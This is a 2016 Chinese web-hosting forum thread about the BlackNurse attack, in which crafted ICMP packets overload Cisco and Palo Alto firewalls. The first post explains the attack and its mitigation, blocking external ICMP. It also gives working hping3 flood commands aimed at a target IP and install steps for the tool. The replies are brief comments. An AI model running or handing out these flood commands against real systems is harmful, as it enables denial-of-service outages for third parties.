全球主机交流论坛

标题: 用这招一台笔记本就能黑翻大型服务器 [打印本页]

作者: henry1118 时间: 2016-11-14 16:50
标题: 用这招一台笔记本就能黑翻大型服务器
以往黑客在针对网络服务器发动攻击时常常会动用大量的“肉鸡”来同时向服务器发送请求，从而导致服务器信息拥堵崩溃。但来自TDC安全运营中心的技术人员发现一种全新的攻击方式，黑客只需要一台笔记本就能够让大型网络服务器宕机。这种新的攻击技术名为BlackNurse，它的精髓不是利用大量的信息流来轰炸服务器，而是通过发送特殊形式的Internet控制消息协议数据包来让服务器防火墙自己产生大量的冗余信息，最终把自己“噎死”。目前，BlackNurse已经被验证对采用Cisco、Palo Alto Networks方案部署的服务器防火墙能够奏效。不过，TDC技术人员表示，目前已经有可以防止BlackNurse攻击的方法。用户需要设置防火墙过滤规则，阻止外部ICMP数据包进入。对此，Cisco、Palo Alto Networks都表示自己的防火墙都默认屏蔽外部ICMP数据包，但也不排除部分用户基于特殊需要而开放这一规则。在允许外部ICMP数据包进入的情况下，任何一台计算机都可能触发BlackNurse攻击。

根据记载

你需要 15-18 Mbit/s. 带宽

用 Hping3 下面任意一个命令

hping3 -1 -C 3 -K 3 -i u20 <target ip>
hping3 -1 -C 3 -K 3 --flood <target ip>

会产生大约 180 Mbit/s DoS attack

///////////////////////////////////////////////////////////////////
Install HPing

1: Install EPEL Repository

shell> sudo yum install epel-release

2: Install HPing3

shell> sudo yum install hping3
////////////////////////////////////////////////////////////////////

请仅仅用于网站测试

参考网址 http://blacknurse.dk/

作者: 斜阳晚暮 时间: 2016-11-14 16:59
180M就黑翻大型服务器了？

作者: dengxin6 时间: 2016-11-14 17:04

斜阳晚暮发表于 2016-11-14 16:59
180M就黑翻大型服务器了？

天朝100M基本都翻了吧不过这种攻击防火墙很容易防的

作者: gmal 时间: 2016-11-14 17:08
水贴

作者: lzdszdl 时间: 2016-11-14 17:12

厉害了

作者: ecc 时间: 2016-11-14 17:15
厉害了

作者: Vicer 时间: 2016-11-14 17:16
提示: 作者被禁止或删除内容自动屏蔽

作者: 潜水看美女 时间: 2016-11-14 17:19
黑客之最高境界，用最简单的招式，干翻最强有力的FW

作者: 低调路过 时间: 2016-11-14 17:45
提示: 作者被禁止或删除内容自动屏蔽

作者: yjlml 时间: 2016-11-14 18:01
N-1年前的文章？？

作者: tamicrealo 时间: 2016-11-15 09:01
有那么神吗，，

作者: 今晚我是你的 时间: 2016-11-15 09:18
现在都有opts了

欢迎光临全球主机交流论坛 (https://hostloc.gdisk.cf/)